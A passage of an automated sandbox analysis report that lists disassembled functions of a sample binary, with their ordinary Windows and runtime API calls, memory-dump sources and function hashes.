                                                                                                                    • API String ID: 2506663941-0
                                                                                                                    • Opcode ID: b57269fe9fff99f1514e8a880ca3411b25bc00f1374210e7bfc821550272dc2f
                                                                                                                    • Instruction ID: f49710caf27d8271f3e0a98b2c1cd644b7e4e61c9dd4eab99ab48076d88413a6
                                                                                                                    • Opcode Fuzzy Hash: b57269fe9fff99f1514e8a880ca3411b25bc00f1374210e7bfc821550272dc2f
                                                                                                                    • Instruction Fuzzy Hash: 8D4196719446559ADF20FB60CC59AFABBA8FF40304F4404EAA98A77093EF715E85CB50
                                                                                                                    Function 005813E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 005813E1
                                                                                                                      • Part of subcall function 00585E37: __EH_prolog.LIBCMT ref: 00585E3C
                                                                                                                      • Part of subcall function 0058CE40: __EH_prolog.LIBCMT ref: 0058CE45
                                                                                                                      • Part of subcall function 0058B505: __EH_prolog.LIBCMT ref: 0058B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 4d65f053a6b8240b9619a182acb6899cde4c13770424d8ea1aa501fbaacf320d
                                                                                                                    • Instruction ID: b3f7645d78f854e7d31cefc1e032aed8a8a9830a9f7e3e67818257911cfbb0f9
                                                                                                                    • Opcode Fuzzy Hash: 4d65f053a6b8240b9619a182acb6899cde4c13770424d8ea1aa501fbaacf320d
                                                                                                                    • Instruction Fuzzy Hash: 57415BB0905B419EE724DF398889AE6FFE9BF18300F50492ED5FE93282CB316654CB14
                                                                                                                    Function 005813DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 005813E1
                                                                                                                      • Part of subcall function 00585E37: __EH_prolog.LIBCMT ref: 00585E3C
                                                                                                                      • Part of subcall function 0058CE40: __EH_prolog.LIBCMT ref: 0058CE45
                                                                                                                      • Part of subcall function 0058B505: __EH_prolog.LIBCMT ref: 0058B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 2aedbf5b5c7a9007f8d01b42d8d1fc165ef6526ef7545842c5c643575f9f7324
                                                                                                                    • Instruction ID: 3ec0923859d4ae2612c5cb51a92a352bfa8fe59e7cc8f06244b269f7661d823f
                                                                                                                    • Opcode Fuzzy Hash: 2aedbf5b5c7a9007f8d01b42d8d1fc165ef6526ef7545842c5c643575f9f7324
                                                                                                                    • Instruction Fuzzy Hash: CA4158B0905B419EE724DF798889AE6FFE9BF18300F50492ED5FE93282CB316654CB10
                                                                                                                    Function 0059B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0059B098
                                                                                                                      • Part of subcall function 005813DC: __EH_prolog.LIBCMT ref: 005813E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: f909961d4d7030fe4ac6411c09b6970cf62b914efc5b6a3f847b24be1d974aab
                                                                                                                    • Instruction ID: f556a7f86f7cd213debb319e8f5caa938ddf5c6537545f15aabe9cb8fd793ed7
                                                                                                                    • Opcode Fuzzy Hash: f909961d4d7030fe4ac6411c09b6970cf62b914efc5b6a3f847b24be1d974aab
                                                                                                                    • Instruction Fuzzy Hash: 1C319E71C0024ADAEF14EF64D9559EEBFB8BF49304F10449EE809B7242D735AE05CB61
                                                                                                                    Function 005AAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 005AACF8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: ceffada132392b26bd9eff34f19f218cf3b28d39997c9f8c7d49ad5bd0f7ecff
                                                                                                                    • Instruction ID: 69cc2056ed53874a70b661de58cce926a472452150a7d225efe7b78a6a27eb89
                                                                                                                    • Opcode Fuzzy Hash: ceffada132392b26bd9eff34f19f218cf3b28d39997c9f8c7d49ad5bd0f7ecff
                                                                                                                    • Instruction Fuzzy Hash: 59110633A006256FAB229E28EC5589E7B95FB8633071A4620FC55AB254EB34EC05D7D2
                                                                                                                    Function 00589215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: e4d4ca9dea6e4b9d84d6d562b564efd79994161030e21bb7a1e5b2411ce048d8
                                                                                                                    • Instruction ID: 3de35ddab6f919b986ab05a4d80e45d6c1d13a013c28a5fdc7a75c2dd43a5942
                                                                                                                    • Opcode Fuzzy Hash: e4d4ca9dea6e4b9d84d6d562b564efd79994161030e21bb7a1e5b2411ce048d8
                                                                                                                    • Instruction Fuzzy Hash: 94013037900529ABCF11BBA8CD869EEBF76BFC8750B054615EC16B7152DA348D05C7A0
                                                                                                                    Function 005AC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005AB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,005A9813,00000001,00000364,?,005A3F73,00000050,?,005C1030,00000200), ref: 005AB177
                                                                                                                    • _free.LIBCMT ref: 005AC4E5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                    • Instruction ID: 7382863a059e81651a7be332b613c863f2f31511636730f03f7b8f21169c8077
                                                                                                                    • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                    • Instruction Fuzzy Hash: AD01D6726043066BE7318E65988596EFFE9FBCA370F250A1DE59483281EA30A905C768
                                                                                                                    Function 005AB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,005A9813,00000001,00000364,?,005A3F73,00000050,?,005C1030,00000200), ref: 005AB177
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: 7b44d36b1da66c210263adad2176d94954e2d770370a1f1ff84a4a493d461405
                                                                                                                    • Instruction ID: b590011ef957c1532b06e05ebe87416592de16ca63a52adf3fc4e7ed4d08e575
                                                                                                                    • Opcode Fuzzy Hash: 7b44d36b1da66c210263adad2176d94954e2d770370a1f1ff84a4a493d461405
                                                                                                                    • Instruction Fuzzy Hash: 63F0543250512577FB255A61AC29B5E7F48BB93770F188211F808AA192CB30DD01C6E1
                                                                                                                    Function 005A3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 005A3C3F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: f5baa2bf1289e12cbae3482bf4752a495c39beeab9f9df506de2152a5207e6be
                                                                                                                    • Instruction ID: e548eed382b3252d2c8d66add66e2f18ec6c7c26a7824c3fe1e39c15d8117a0e
                                                                                                                    • Opcode Fuzzy Hash: f5baa2bf1289e12cbae3482bf4752a495c39beeab9f9df506de2152a5207e6be
                                                                                                                    • Instruction Fuzzy Hash: F4F0A7322002169FCF155E68EC1899E7B99FF42B347104125FA05E7190DB31EE20D790
                                                                                                                    Function 005A8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005ACA2C,00000000,?,005A6CBE,?,00000008,?,005A91E0,?,?,?), ref: 005A8E38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: 32c38d55d11a2c3a9f33daab839e2505e17bd675bf8c61fccb0de9b052ddff20
                                                                                                                    • Instruction ID: 2a38ceb6f5e5ad8a37d22ebc48bcddbf4f1905ce93de49e480d5004a001bf409
                                                                                                                    • Opcode Fuzzy Hash: 32c38d55d11a2c3a9f33daab839e2505e17bd675bf8c61fccb0de9b052ddff20
                                                                                                                    • Instruction Fuzzy Hash: 9EE0E531202226D6DB7127619C08B7F7E8CBB933B0F110110AC499A181DF21DC0085E1
                                                                                                                    Function 00585ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00585AC2
                                                                                                                      • Part of subcall function 0058B505: __EH_prolog.LIBCMT ref: 0058B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 2026382d8748687361a63740512c7d59c938c84be2f71de612c813f0275749b0
                                                                                                                    • Instruction ID: 6cb3a292f90794a8d5e92e560a67e67ef8d5021671a2a06867eeb58236764c18
                                                                                                                    • Opcode Fuzzy Hash: 2026382d8748687361a63740512c7d59c938c84be2f71de612c813f0275749b0
                                                                                                                    • Instruction Fuzzy Hash: 4B018130510691DEDB15E7B8C0497DDFFE4EF94304F54488DA456632C2DBB42B08D7A2
                                                                                                                    Function 0058A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0058A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0058A592,000000FF,?,?), ref: 0058A6C4
                                                                                                                      • Part of subcall function 0058A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0058A592,000000FF,?,?), ref: 0058A6F2
                                                                                                                      • Part of subcall function 0058A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0058A592,000000FF,?,?), ref: 0058A6FE
                                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0058A598
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1464966427-0
                                                                                                                    • Opcode ID: c73209b8f0f0693de7011476b0789b51ff81ffea15e8a3fb7d7d417ca984e9df
                                                                                                                    • Instruction ID: 27a45a2e6aae6b87291e4bb797a4746cda3096cc5a9b4d5df3a815221c87cf9f
                                                                                                                    • Opcode Fuzzy Hash: c73209b8f0f0693de7011476b0789b51ff81ffea15e8a3fb7d7d417ca984e9df
                                                                                                                    • Instruction Fuzzy Hash: BDF0E935009390AAEF2277B448087C77F907F55331F048A0AF8FD32096C27110D49B23
                                                                                                                    Function 00590E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00590E3D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecutionStateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2211380416-0
                                                                                                                    • Opcode ID: e3568c436ec84074b80fc8113a1165e01464eb801c98ebb0a91bb2f71ce98511
                                                                                                                    • Instruction ID: 61584b5ec5803b8849ccaa79af3173bfbad5eaf0175bb2c7b098f175f310df80
                                                                                                                    • Opcode Fuzzy Hash: e3568c436ec84074b80fc8113a1165e01464eb801c98ebb0a91bb2f71ce98511
                                                                                                                    • Instruction Fuzzy Hash: 02D0C2106014661EDF113328291DBFE2E0BBFD7310F0C0425F445771C3CA540C86A3A5
                                                                                                                    Function 0059A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0059A62C
                                                                                                                      • Part of subcall function 0059A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0059A3DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1915507550-0
                                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                    • Instruction ID: ae3edbdf9900fe965594a2a7f9738a4370b95e595328425ec36dbf8999b0b800
                                                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                    • Instruction Fuzzy Hash: DDD0C97161020ABADF42AB72CC1797E7EDAFB41340F048525B842D5191EAB1D910A6B2
                                                                                                                    Function 0059DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00591B3E), ref: 0059DD92
                                                                                                                      • Part of subcall function 0059B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0059B579
                                                                                                                      • Part of subcall function 0059B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0059B58A
                                                                                                                      • Part of subcall function 0059B568: IsDialogMessageW.USER32(00010448,?), ref: 0059B59E
                                                                                                                      • Part of subcall function 0059B568: TranslateMessage.USER32(?), ref: 0059B5AC
                                                                                                                      • Part of subcall function 0059B568: DispatchMessageW.USER32(?), ref: 0059B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 897784432-0
                                                                                                                    • Opcode ID: 8c8009d84c007fb051283e25205e4eb4bd1640833baf23910c8253d9c59fceb4
                                                                                                                    • Instruction ID: 19439e25e4ce3153603f704c958c6cd3ed4bb4907deef80e2844fd1b010b4833
                                                                                                                    • Opcode Fuzzy Hash: 8c8009d84c007fb051283e25205e4eb4bd1640833baf23910c8253d9c59fceb4
                                                                                                                    • Instruction Fuzzy Hash: 0AD09E31144301BEEE052B51DE0AF1A7AA2BB98B08F004955B284740F186729D25EB11
                                                                                                                    Function 0059E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DloadProtectSection.DELAYIMP ref: 0059E5E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
